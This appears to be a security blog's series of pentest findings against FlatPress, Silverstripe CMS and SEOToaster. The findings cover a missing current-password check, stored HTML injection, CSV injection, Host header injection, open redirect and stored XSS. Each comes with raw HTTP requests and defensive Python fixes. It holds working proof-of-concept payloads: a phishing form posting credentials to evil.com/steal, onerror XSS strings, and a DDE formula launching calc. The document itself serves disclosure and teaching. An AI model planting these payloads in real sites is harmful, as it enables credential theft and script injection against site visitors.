Sunday, 21 September 2025

Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description

- It was noted that the application did not require the current password when changing the password: the admin "General Settings" form takes only a new password and its confirmation, so anyone who can drive an authenticated admin session (a hijacked session or an unattended logged-in browser) can set a new password without knowing the existing one


Current Password not Required when Changing Password #1:

Steps to Reproduce:

  1. Login with admin user and visit "Main" > "Configuration" > "General Settings"
  2. The form has no "current password" field: the POST below carries only password and confirm_password, so a new password is accepted without proving knowledge of the old one

// HTTP POST Request

POST /FlatPressc4hak4mvef/admin.php?p=config&action=default HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=c1d6797fb9&_wp_http_referer=%2FFlatPressc4hak4mvef%2Fadmin.php%3Fp%3Dconfig&admin=admin&password=&confirm_password=&title=FlatPress&subtitle=My+FlatPress+blog&blogfooter=&author=test&www=http%3A%2F%2Fdemos5.softaculous.com%2FFlatPressc4hak4mvef%2F&email=demos%40softaculous.com&notify=on&startpage=%3ANULL%3A&maxentries=5&timeoffset=0&dateformat=%25A%2C+%25B+%25e%2C+%25Y&dateformatshort=%25Y-%25m-%25d&timeformat=%25H%3A%25M%3A%25S&lang=en-us&charset=utf-8&save=Save+Changes


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 15:14:16 GMT
Server: FlatPress
[...]
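
The check that the General Settings handler is missing, as an added Python example (not FlatPress code, and not its API): the current password is verified before a new one is accepted, and a per-user session generation is bumped so every other session of the account is logged out. The field names password and confirm_password mirror the request above; current_password, the user record layout and the iteration count are assumptions.

```python
"""Password change that re-authenticates with the current password.

Added example in Python; it is not FlatPress code and does not use its
API. It models what the General Settings handler should do before
accepting a new password: verify the existing one, check confirmation
and length, and bump a per-user session generation so every other
session of that account is logged out. The field names password and
confirm_password mirror the request on this page; current_password and
the user record layout are assumptions.
"""
import hashlib
import hmac
import os


class PasswordChangeError(ValueError):
    """A change request failed one of the checks in change_password()."""


def hash_password(password, salt=None, iterations=600_000):
    """PBKDF2-HMAC-SHA256 record: salt, iteration count and derived key."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": dk}


def verify_password(password, record):
    """Constant-time comparison of `password` against a stored record."""
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(dk, record["hash"])


def change_password(user, current_password, password, confirm_password, min_len=12):
    """Rotate `user`'s password; `user` is a dict holding the hash record.

    The first check is the one the FlatPress form skips: the caller has to
    prove knowledge of the current password, so a hijacked or unattended
    admin session on its own is not enough to take over the account.
    """
    if not current_password or not verify_password(current_password, user["password"]):
        raise PasswordChangeError("current password is missing or incorrect")
    if password != confirm_password:
        raise PasswordChangeError("new password and confirmation differ")
    if len(password) < min_len:
        raise PasswordChangeError(f"new password is shorter than {min_len} characters")
    if verify_password(password, user["password"]):
        raise PasswordChangeError("new password must differ from the current one")
    # Keep the record's iteration count here; a real handler would apply
    # the current policy value instead.
    user["password"] = hash_password(password, iterations=user["password"]["iterations"])
    # Sessions remember the generation they were issued under and are
    # rejected once it no longer matches, which logs out the attacker too.
    user["session_generation"] += 1
    return True


def try_change(user, current_password, password, confirm_password):
    """None on success, otherwise the rejection reason as a string."""
    try:
        change_password(user, current_password, password, confirm_password)
    except PasswordChangeError as exc:
        return str(exc)
    return None


def make_user(password, iterations=600_000):
    """Constructed user record for demonstration; no real credentials."""
    return {"password": hash_password(password, iterations=iterations),
            "session_generation": 0}


if __name__ == "__main__":
    admin = make_user("correct horse battery staple")
    # What the FlatPress form effectively submits: no current password.
    print("no current password ->", try_change(admin, "", "NewPassw0rd!2025", "NewPassw0rd!2025"))
    print("with current password ->", try_change(admin, "correct horse battery staple",
                                                  "NewPassw0rd!2025", "NewPassw0rd!2025"))
    print("session generation:", admin["session_generation"])
```

The session-generation step matters as much as the re-authentication: without it, an attacker who already holds a session keeps it after the legitimate owner rotates the password.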



Friday Fun Pentest Series - 41 - Stored HTML Injection - flatpressv1.4.1

Description

- It was noted that the application was vulnerable to Stored HTML Injection in the "Write Entry" functionality


Stored HTML Injection #1:

Steps to Reproduce:

- Login with admin user, visit "Main" > "New Entry" > "Write Entry" and enter the payload below in the entry content; the [html] BBCode tag makes FlatPress emit the markup unmodified, so the phishing form renders for every visitor of the published entry

[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]


// HTTP POST Request

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=-- Selection --&imageselect=-- Selection --&content=[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 21 Sep 2025 16:12:55 GMT
Server: FlatPress
[...]


// HTTP GET Request

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 16:12:58 GMT
Server: FlatPress
[...]

[...]
<div itemprop="articleBody"><p><div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div></p></div>
[...]





Saturday, 23 August 2025

Friday Fun Pentest Series - 40 - CSV Injection - silverstripecmsv6.0.0

Description

- It was noted that the application was vulnerable to CSV Injection in the "Users" functionality


CSV Injection #1:

Steps to Reproduce:
  1. Login and visit "Security" > "Add Member", enter =30*30 in "First Name" and save
  2. Then visit "Reports" > "Users, Groups and Permissions" > "Export as CSV"
  3. The value is written to the CSV unescaped, and a spreadsheet opening the file evaluates the cell as a formula (900 rather than the literal text =30*30)


// HTTP POST Request

POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm HTTP/1.1
Host: demo.silverstripe.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]
FirstName=%3D30*30&Surname=test&Email=test%40example.com&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%2Fdemo.silverstripe.org%2Fadmin%2Fsecurity


// HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]
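
How an exporter neutralises cells like the one above, and how to scan an existing export for them, as an added Python example (not Silverstripe code). The column names, trigger characters and sample rows are assumptions; the first sample row reuses the payload from this finding.

```python
"""CSV export hardening against formula injection.

Added example in Python, not Silverstripe code. Two pieces:
  * neutralise_cell(): the export-side fix. Any cell whose first
    (non-space) character is one of = + - @ or a tab/CR/LF is prefixed
    with a single quote, which spreadsheets treat as "text, do not
    evaluate". The writer quotes every field so separators and quotes
    inside data cannot start a new cell.
  * find_formula_cells(): the review-side check, scanning an existing
    CSV export for cells that a spreadsheet would evaluate.
Sample rows are constructed; the first reuses the payload from this page.
"""
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")
COLUMNS = ("FirstName", "Surname", "Email")


def is_formula_like(value):
    """True if a spreadsheet would evaluate `value` rather than display it."""
    if not isinstance(value, str):
        return False
    # Conservative: also catch a trigger preceded by whitespace.
    return value[:1] in FORMULA_TRIGGERS or value.lstrip()[:1] in FORMULA_TRIGGERS


def neutralise_cell(value):
    """Prefix formula-like text with an apostrophe so it is stored as text."""
    if is_formula_like(value):
        return "'" + value
    return value


def export_members(members, neutralise=True):
    """CSV text for `members`; neutralise=False reproduces the unsafe export."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(COLUMNS)
    for member in members:
        cells = [member.get(col, "") for col in COLUMNS]
        if neutralise:
            cells = [neutralise_cell(cell) for cell in cells]
        writer.writerow(cells)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """(row, column, value) for every formula-like cell in `csv_text`."""
    hits = []
    for row_no, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for col_no, cell in enumerate(row, start=1):
            if is_formula_like(cell):
                hits.append((row_no, col_no, cell))
    return hits


# Constructed sample data: the first row is the payload used on this page,
# the others are classic DDE/formula variants and a benign negative value.
SAMPLE_MEMBERS = [
    {"FirstName": "=30*30", "Surname": "test", "Email": "test@example.com"},
    {"FirstName": "+cmd|' /C calc'!A0", "Surname": "dde", "Email": "dde@example.com"},
    {"FirstName": "@SUM(1+1)", "Surname": "at", "Email": "at@example.com"},
    {"FirstName": "Alice", "Surname": "-2+3", "Email": "alice@example.com"},
]

if __name__ == "__main__":
    unsafe = export_members(SAMPLE_MEMBERS, neutralise=False)
    print("unsafe export flags:", find_formula_cells(unsafe))
    safe = export_members(SAMPLE_MEMBERS)
    print(safe)
    print("safe export flags:", find_formula_cells(safe))
```

The apostrophe prefix also mangles legitimate values that start with a minus sign (negative numbers, phone numbers written as -), and some spreadsheet tools display the apostrophe; apply it to free-text columns and keep numeric columns typed as numbers instead.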





Friday Fun Pentest Series - 39 - Host Header Injection - silverstripecmsv6.0.0

Description

- It was noted that the application was vulnerable to Host Header Injection in the login page


Host Header Injection #1:

Steps to Reproduce:

  1. Submit the login form with the Host header changed to a Burp Collaborator domain
  2. Upon logging in the Collaborator receives a DNS lookup for that domain from the server side, showing that the client-supplied Host header is resolved (and so trusted) rather than checked against the configured hostname. Note that the response below is an Incapsula block page (503), so the resolving IP may belong to the WAF/CDN layer in front of the application rather than to the application host itself; confirm with a request that reaches the origin before rating the impact

// HTTP POST Request

POST /Security/login/default/LoginForm HTTP/1.1
Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
[...]

AuthenticationMethod=SilverStripe%5CSecurity%5CMemberAuthenticator%5CMemberAuthenticator&Email=admin&Password=password&SecurityID=5afbb1fab346375510939ba7b65499e556b0251c&action_doLogin=Log+in


// HTTP Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Cache-Control: no-cache, no-store
[...]

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=27&xinfo=1014-115438578-0%200NNN%20RT%281755353110306%2067%29%20q%280%20-1%20-1%20-1%29%20r%284%20-1%29&incident_id=0-468567604813498382&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-468567604813498382</iframe></body></html>


// Burp Collab domain hit

The Collaborator server received a DNS lookup of type CNAME for the domain name www.7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com.  
The lookup was received from IP address 149.126.76.44:7396 at 2025-Aug-16 14:05:10.562 UTC.
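
The server-side fix is to treat Host as untrusted input: accept only names from a deployment allowlist and otherwise use the configured canonical base (or refuse the request). Added Python example, not Silverstripe code; ALLOWED_HOSTS and CANONICAL_BASE are assumed configuration values for the demo site, and the sample request is constructed from the one above.

```python
"""Host header validation against a configured allowlist.

Added example in Python; not Silverstripe code. A framework that builds
absolute URLs (password-reset links, canonical redirects, asset URLs)
from the incoming Host header will embed or resolve whatever the client
sent, which is what the Collaborator DNS hit on this page shows. The fix
is to treat Host as untrusted input: accept only names from a deployment
allowlist and otherwise use the configured canonical base. ALLOWED_HOSTS
and CANONICAL_BASE are assumed configuration values for the demo site.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"demo.silverstripe.org"}
CANONICAL_BASE = "https://demo.silverstripe.org"


def parse_request_headers(raw_request):
    """Headers from raw HTTP request text (request line skipped, names lowercased)."""
    headers = {}
    for line in raw_request.strip().splitlines()[1:]:
        if not line.strip():
            break  # end of the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def validated_host(headers, allowed_hosts=ALLOWED_HOSTS):
    """Hostname from Host if it is allowlisted, else None.

    Port and case are normalised. X-Forwarded-Host is deliberately
    ignored; it must only be honoured for a proxy you control.
    """
    host = headers.get("host", "")
    try:
        hostname = urlsplit("//" + host).hostname or ""
    except ValueError:  # malformed authority, e.g. unbalanced IPv6 brackets
        return None
    hostname = hostname.rstrip(".").lower()
    return hostname if hostname in allowed_hosts else None


def should_reject_request(headers):
    """True when the request should get a 400 instead of being served.

    Rejecting outright (the Django ALLOWED_HOSTS behaviour) is stricter
    than silently substituting the canonical host and is the better default.
    """
    return validated_host(headers) is None


def absolute_url(headers, path):
    """Absolute URL for `path`, never derived from an unvalidated Host."""
    host = validated_host(headers)
    if host is None:
        return CANONICAL_BASE + path
    return "https://" + host + path


# Constructed from the request shown on this page (body omitted).
ATTACK_REQUEST = """POST /Security/login/default/LoginForm HTTP/1.1
Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
"""

if __name__ == "__main__":
    hdrs = parse_request_headers(ATTACK_REQUEST)
    print("reject:", should_reject_request(hdrs))
    print("reset link host would be:", absolute_url(hdrs, "/Security/lostpassword"))
```

The allowlist compares hostnames only, so user@host authorities, lookalike suffixes and injected ports all fail the check; the canonical base is used for generated links whenever the request does not pass.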


Wednesday, 30 July 2025

Friday Fun Pentest Series - 38 - Lack of Password Change Functionality - seotoasterv2.5.0

Description

- It was noted that the application lacked password change functionality


Lack of Password Change Functionality #1

Steps to Reproduce:
  1. Login with a low-privilege user and browse the account area: there is no password change functionality, so a user cannot rotate a compromised or shared password without administrator help

// HTTP POST Request

POST /seotoaster/go HTTP/1.1
Host: 192.168.58.149
Content-Length: 108
Cache-Control: max-age=0
Accept-Language: en-GB,en;q=0.9
Origin: http://192.168.58.149
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]

email=test2%40example.com&password=Passw0rd%21&submit=Let+me+in&secureToken=477a9f50c8616d5ee4cabf2038fc43a3


// HTTP Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Jul 2025 14:44:11 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]



Friday Fun Pentest Series - 37 - Open Redirect "Login Page" Functionality - seotoasterv2.5.0

Description

- It was noted that the application was vulnerable to Open Redirect in the "Login Page"


Open Redirect "Login Page" Functionality #1

Steps to Reproduce:
  1. Submit the login form with the Referer header set to an attacker-controlled domain; after a successful login the application redirects (301, see the Location header below) to that domain. Since the browser sets Referer from the page that hosted the form, a login submitted from an attacker's page would send the freshly authenticated user to the attacker's site

// HTTP POST Request

POST /seotoaster/go HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

email=admin%40example.com&password=Pasw0rd%21&submit=Let+me+in&secureToken=f3a4d32c75942f7f284ae9189e21d431



// HTTP Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Jul 2025 13:55:07 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://lzoujc24ovcp1k9ky066bcmas1ysmuaj.oastify.com
[...]
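
A post-login redirect that cannot leave the application, as an added Python example (not SEOToaster code): absolute targets are accepted only when their scheme and authority equal the configured origin, and are then reduced to path, query and fragment; other hosts, protocol-relative //host, backslash variants, javascript: or data: schemes and control characters fall back to a fixed landing page. APP_ORIGIN and DEFAULT_TARGET are assumed values for the lab host on this page.

```python
"""Post-login redirect that stays on the application origin.

Added example in Python; not SEOToaster code. The login handler on this
page redirects to whatever the Referer header says. This version only
ever returns a same-site path: absolute URLs are accepted solely when
their scheme and authority equal the configured origin, then reduced to
path+query+fragment; anything else falls back to DEFAULT_TARGET.
APP_ORIGIN and DEFAULT_TARGET are assumed values for the lab host.
"""
from urllib.parse import urlsplit, urlunsplit

APP_ORIGIN = "http://192.168.58.149"
DEFAULT_TARGET = "/seotoaster/"


def safe_redirect_target(candidate, origin=APP_ORIGIN, default=DEFAULT_TARGET):
    """Return a redirect target that stays on `origin`, or `default`."""
    if not candidate:
        return default
    # Browsers treat a backslash in the authority like a slash, so
    # "/\evil" would become "//evil"; normalise before parsing.
    text = candidate.strip().replace("\\", "/")
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in text):
        return default  # header/response splitting characters
    try:
        parts = urlsplit(text)
    except ValueError:
        return default
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative: only our exact origin. This also
        # rejects user@host, lookalike hosts and injected ports.
        if f"{parts.scheme}://{parts.netloc}".lower() != origin.lower():
            return default
    elif not parts.path.startswith("/"):
        # A relative path without a leading slash resolves against the
        # current page; refuse rather than guess.
        return default
    path = parts.path or "/"
    # Rebuild from components rather than echoing the input, so "///evil"
    # (which browsers read as http://evil/) comes back as "/evil".
    return urlunsplit(("", "", path, parts.query, parts.fragment))


def post_login_redirect(referer_header):
    """Where to send the user after a successful login."""
    return safe_redirect_target(referer_header)


if __name__ == "__main__":
    # Constructed inputs; the first is the Location seen on this page.
    for ref in ("http://lzoujc24ovcp1k9ky066bcmas1ysmuaj.oastify.com",
                "http://192.168.58.149/seotoaster/pages?tab=2",
                "//evil.example/", "/\\evil.example/", "javascript:alert(1)",
                "/seotoaster/dashboard"):
        print(f"{ref!r:55} -> {post_login_redirect(ref)}")
```

Returning a path rather than an absolute URL sidesteps host-matching subtleties entirely; if the application needs absolute redirects, it should prefix the validated path with its own configured origin.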

Friday Fun Pentest Series - 36 - Stored XSS "Edit General Info" Functionality - seotoasterv2.5.0

Description

- It was noted that the application was vulnerable to Stored Cross-Site Scripting (XSS) in the "Edit General Info" functionality


Stored XSS "Edit General Info" #1

Steps to Reproduce

  1. Login with admin and visit "Website ID Card" > "Website Id Card"
  2. In "Organization Name" (and "Organization Description") enter the payload "><img src=x onerror=alert(`xss1`)> and save; the value is reflected unencoded inside the value="" attribute of the same form (see the response below), so the payload breaks out of the attribute and executes whenever the page is loaded

// HTTP POST Request

POST /seotoaster/plugin/widcard/run/setWebsiteIdCard HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
Content-Disposition: form-data; name="organization_name"

"><img src=x onerror=alert(`xss1`)>
------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
Content-Disposition: form-data; name="organization_description"

"><img src=x onerror=alert(`xss2`)>
------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
[...]


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 20 Jul 2025 15:35:07 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]


// HTTP GET Request

GET /seotoaster/plugin/widcard/run/getWebsiteIdCard HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 15:35:11 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

[...]
<input type="text" name="organization_name" value=""><img src=x onerror=alert(`xss1`)>" />
[...]
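
The two stored-injection findings on this page (the FlatPress [html] entry body in post 41 and the SEOToaster organization_name field in post 36) need two different fixes, shown together in one added Python example that is neither project's code: an allowlist sanitiser for content that is meant to carry markup, and attribute-context escaping for a value echoed into value="". The allowlists are assumptions for the demonstration; the sample inputs are the payloads shown on this page.

```python
"""Output handling for the two stored-injection findings on this page.

Added example in Python; it is not FlatPress or SEOToaster code. It
shows the two fixes the two findings need, which are not the same:
  * sanitize_rich_html(): for content that is meant to contain markup
    (the FlatPress [html] entry body). An allowlist parser keeps harmless
    structural tags and drops everything else, including <form>, <input>,
    <script>, inline style, on* event handlers and javascript: links, so
    a phishing form cannot be stored for visitors.
  * render_org_name_input(): for a value echoed inside an attribute
    (the SEOToaster organization_name field). Here the fix is
    attribute-context escaping; a sanitiser is the wrong tool because
    the "> breakout contains no tag at all.
The allowlists are assumptions for the demo; the sample inputs are the
payloads shown on this page.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "div", "h2", "h3", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}


def _safe_href(value):
    """Only http(s) or site-relative links; blocks javascript:, data:, //host."""
    v = (value or "").strip().lower()
    return (v.startswith("http://") or v.startswith("https://")
            or (v.startswith("/") and not v.startswith("//")))


class _Sanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; text is always escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops style=, on*=, and anything else unlisted
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def sanitize_rich_html(html_text):
    """Return (clean_html, list_of_dropped_tags)."""
    parser = _Sanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out), parser.dropped


def escape_attr(value):
    """Encode for a double-quoted HTML attribute value."""
    return escape(value, quote=True)


def render_org_name_input(org_name):
    """Hardened form of the template line shown in the response above."""
    return f'<input type="text" name="organization_name" value="{escape_attr(org_name)}" />'


# Constructed sample inputs, copied from the payloads on this page.
PHISH_ENTRY = (
    '<div style="border:2px solid red;padding:20px;margin:20px;background:yellow">'
    '<h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p>'
    '<form action="https://evil.com/steal"><input type="text" placeholder="Username">'
    '<input type="password" placeholder="Password"><button>Login</button></form></div>'
)
XSS_NAME = '"><img src=x onerror=alert(`xss1`)>'

if __name__ == "__main__":
    clean, dropped = sanitize_rich_html(PHISH_ENTRY)
    print(clean)
    print("dropped tags:", dropped)
    print(render_org_name_input(XSS_NAME))
```

html.parser is tolerant rather than spec-exact, so this allowlist approach illustrates the design; in production use a maintained HTML sanitiser and keep the escaping rule for every attribute context, which no sanitiser replaces.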
